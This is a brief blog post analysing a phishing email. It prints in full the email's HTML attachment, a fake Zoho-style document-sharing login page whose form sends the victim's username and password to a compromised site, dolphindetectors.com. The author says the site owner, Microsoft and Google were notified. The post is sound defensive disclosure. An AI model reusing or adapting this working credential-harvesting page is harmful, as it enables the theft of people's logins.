Phishing, Dolphin Detectors and Office 365

Phishing, Dolphin Detectors and Office 365 This is an interesting phishing email - the attachment is

Phishing, Dolphin Detectors and Office 365

This is an interesting phishing email - the attachment is html and reads thus:

<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<html>
<head>
<link href="https://css.zohostatic.com/iam/M_3693668/v2/components/css/signin.css" type="text/css" rel="stylesheet"/>
<link href="https://css.zohostatic.com/iam/M_3693668/v2/components/css/flagStyle.css" type="text/css" rel="stylesheet" defer/>
<meta name="robots" content="noindex, nofollow"/>
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no" />
<title>Document Sharing</title>
</head>
<body>
<div class="bg_one"></div>
<div class="Alert"> <span class="tick_icon"></span> <span class="alert_message"></span> </div>
</div>
<div class="signin_container">
<div class="signin_box" id="signin_flow">
<!-- <div class='zoho_logo ZohoSupport'></div> -->
<div id="signin_div">
<form name="login" id="login" action="https://dolphindetectors.com/@33/maring.php" method="post" validate >
<div class="signin_head">
<span id="headtitle">Sign in</span>
<span id="trytitle"></span>
<div class="service_name">to access <span>Document</span></div>
<div class="fielderror"></div>
</div>
<div class="fieldcontainer">
<div class="searchparent" id="login_id_container">
<div class="textbox_div" id="getusername">
<span>
<input id="login_id" placeholder="" value="[email protected]" type="email" name="username" class="textbox" required="" autofocus autocapitalize="off" autocomplete="email" autocorrect="off" tabindex="1" />
<span class="doaminat hide" onclick="enableDomain()">@</span>
<div class="textbox hide" id="portaldomain">
</div>
<div class="fielderror"></div>
</span>
</div><div class="textbox_div">
<input id="password" placeholder="Enter password" name="password" type="password" class="textbox" required="" autofocus autocapitalize="off" autocomplete="password" tabindex="2" autocorrect="off" />
<span class="icon-hide show_hide_password" onclick="showHidePassword();"></span>
<div class="fielderror"></div>
</div>
</div>
<div class="textbox_div" id="mfa_device_container">
<div class="devices">
<select class='secondary_devices' onchange='changeSecDevice(this);'></select>
<div class="deviceparent">
<span class="deviceinfo icon-device"></span>
<span class="devicetext"></span>
</div>
</div>
</div>
 

<button class="btn blue waitbtn" id="waitbtn">
<span class="loadwithbtn"></span>
<span class="waittext">Waiting for approval</span>
</button>
</div>

<div id="problemsigninui"></div>
<button class="btn blue" id="nextbtn" tabindex="3" type="submit"><span>Open Document</span></button>
</form>
<div id="recovery_container">
<div class="signin_head recoveryhead">
<table id="recoverytitle"><span class='icon-backarrow backoption' onclick='goBackToProblemSignin()'></span><span class="rec_head_text">Can&#39;t access your mobile device?</span></table>
</div>
<div id='recoverymodeContainer'></div>
<div class='recoverymodes'>

<div class="options contact_support">
<div class="img_option icon-support"></div>
<div class="option_details">
<div class="option_title">Contact Support </div>
</div>
</div>
</div>
<div class="btn greytext" ></div>
</div>
<div>
</div>
<div class="line"></div>
</div>
</div>
<div class="rightside_box">
<div class="mfa_panel">
<div class="product_img" id="product_img"></div>
<div class="product_head">Secure document delivery service</div>
<div class="devicedetails"><span class="deviceicon icon-device"></span><span class="devicetext"></span></div>
<div class="devices"><select class="secondary_devices_right" onchange="changeSecDevice(this);"></select></div>
<div class="product_text">Our security service shield and make your document distribution easier and faster.</div>
</div>
</div>
</div>
</div>

</body>
</html>

Now in this case we have substituted the email with [email protected], but you can see that they send the user to dolphindetectors.com where their data is passed on to someone, the below is the attached HTML form.

We have notified the owner of the website, Microsoft and Google.

 


 

Document Sharing

 
 

Add comment